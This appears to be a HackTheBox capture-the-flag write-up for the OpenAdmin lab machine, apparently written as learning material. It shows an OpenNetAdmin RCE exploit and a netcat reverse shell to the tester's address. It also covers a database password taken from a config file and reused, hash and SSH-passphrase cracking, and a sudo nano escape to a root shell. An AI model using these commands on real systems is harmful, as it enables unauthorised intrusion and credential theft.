WriteupsHTB — OpenAdmin
WebEasyLinux
HTB — OpenAdmin
OpenNetAdmin 18.1.1 RCE via command injection in web console. Internal Apache vhost with SSH key in password-protected page for lateral movement.
January 18, 2025HackTheBox
#OpenNetAdmin#Command Injection#RCE#Apache
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.171
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-18 21:11 EST
Nmap scan report for 10.10.10.171
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/18%OT=22%CT=1%CU=39940%PV=Y%DS=2%DC=T%G=Y%TM=678C
OS:5F5F%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TI
OS:=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M
OS:53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=712
OS:0%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%D
OS:F=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G
OS:)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 26.13 ms 10.10.14.1
2 26.23 ms 10.10.10.171
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.47 seconds
dir search
- feroxbusting on
http://10.10.10.171will discover this endpoint/music/ - therefore will discover
/ona
sh
feroxbuster --url http://10.10.10.171/music/
200 GET 0l 0w 0c http://10.10.10.171/ona/modules/mangle.inc.php
200 GET 0l 0w 0c http://10.10.10.171/ona/modules/get_module_list.inc.php
200 GET 0l 0w 0c http://10.10.10.171/ona/modules/ipcalc.inc.php
200 GET 3l 14w 847c http://10.10.10.171/ona/images/icon_close.gif
200 GET 5l 20w 2725c http://10.10.10.171/ona/images/strongbad.gif
200 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/vlan_campus.inc.php
200 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/vlan.inc.php
500 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/domain_server.inc.php
200 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/tag.inc.php
500 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/dhcp_failover.inc.php
500 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/configuration.inc.php
500 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/custom_attribute.inc.php
500 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/domain.inc.php
500 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/subnet.inc.php
500 GET 0l 0w 0c http://10.10.10.171/ona/modules/ona/dhcp_pool.inc.phpOpenNetAmin - v18.1.1
OpenNetAdmin 18.1.1 - Remote Code Execution
- https://www.exploit-db.com/exploits/47691
- https://raw.githubusercontent.com/amriunix/ona-rce/refs/heads/master/ona-rce.py
sh
wget https://raw.githubusercontent.com/amriunix/ona-rce/refs/heads/master/ona-rce.pysh
python3 ona-rce.py check http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] The remote host is vulnerable!shell as www-data
sh
python3 ona-rce.py exploit http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ whoami
www-datash
sh$ busybox nc 10.10.14.6 1234 -e /bin/bashsh
python3 -c 'import pty; pty.spawn("/bin/bash")'sh
./include/auth/local.class.php:58: if($md5pass === $user['password']) {
./config/auth_ldap.config.php:38://$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword';sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN - searching for password
sh
www-data@openadmin:/opt$ grep -rn ./ -ie 'ona_sys'
grep -rn ./ -ie 'ona_sys'
./ona/www/local/config/database_settings.inc.php:12: 'db_login' => 'ona_sys',
www-data@openadmin:/opt$ cat ./ona/www/local/config/database_settings.inc.php:12:
</ona/www/local/config/database_settings.inc.php:12:
cat: './ona/www/local/config/database_settings.inc.php:12:': No such file or directory
www-data@openadmin:/opt$ cat ./ona/www/local/config/database_settings.inc.php
cat ./ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
sh
www-data@openadmin:/home$ mysql -h localhost -u 'ona_sys' -p ''
mysql -h localhost -u 'ona_sys' -p ''
Enter password: n1nj4W4rri0R!sh
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ona_default |
+--------------------+
2 rows in set (0.00 sec)
mysql> use ona_default;sh
mysql> select * from users;
select * from users;
+----+----------+----------------------------------+-------+---------------------+---------------------+
| id | username | password | level | ctime | atime |
+----+----------+----------------------------------+-------+---------------------+---------------------+
| 1 | guest | 098f6bcd... | 0 | 2025-01-19 06:13:03 | 2025-01-19 06:13:03 |
| 2 | admin | 21232f29... | 0 | 2025-01-19 05:55:58 | 2025-01-19 05:55:58 |
+----+----------+----------------------------------+-------+---------------------+---------------------+password reuse for jimmy
sh
www-data@openadmin:/var/www/ona$ su jimmy
su jimmy
Password: n1nj4W4rri0R!
jimmy@openadmin:/opt/ona/www$ whoami
whoami
jimmypriv esc
sh
jimmy@openadmin:/$ uname -a
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linuxsh
jimmy@openadmin:/$ cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionicsh
jimmy@openadmin:/etc/apache2/sites-available$ cat internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
/var/www/internal
sh
jimmy@openadmin:/var/www/internal$ cat index.php
<?php
ob_start();
session_start();
..
..
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
$_SESSION['username'] = 'jimmy';
header("Location: /main.php");
} else {
$msg = 'Wrong username or password.';
}
}
?>
</div> <!-- /container -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
?>" method = "post">
<h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>
</div>
</body>
</html>
hash
txt
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1hashcat
sh
hashcat -m 1700 '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1' /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1:Revealedcreds
jimmy:Revealed
- managed to login with the above creds
id_rsa
sh
ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa': passphrase
sh
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
bloodninjas (id_rsa) sh
ssh -i id_rsa joanna@10.10.10.171
passphrase: bloodninjasuser.txt
sh
joanna@openadmin:~$ cat user.txt
fca1e21d...sudo
sh
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/privsh
joanna@openadmin:~$ sudo /bin/nano /opt/priv
ctrl+r followed by ctrl+x
reset; sh 1>&0 2>&0 # paste this and press enter. Will receive root shellsh
Command to execute: reset; sh 1>&0 2>&0# whoami
rootet Help ^X Read File
# lsancel M-F New Buffer
user.txt
# cd /root
# ls
root.txt
# cat root.txt
e2c4305b...root.txt
sh
e2c4305b...Up next
MediumJan 2025
HTB — Popcorn
File upload bypass on torrent hosting site via content-type manipulation for PHP webshell. Kernel exploit or DirtyCow for privilege escalation.
Read writeup
EasyJan 2025
HTB — Heist
Cisco IOS config file exposed via web portal with hashed passwords. Cracked hashes reused for RPC access, Looney Tunables for escalation.
Read writeup
EasyJan 2025
HTB — BoardLight
Dolibarr CRM CVE-2023-30253 PHP injection for RCE. Enlightenment window manager SUID binary exploit for local privilege escalation to root.
Read writeup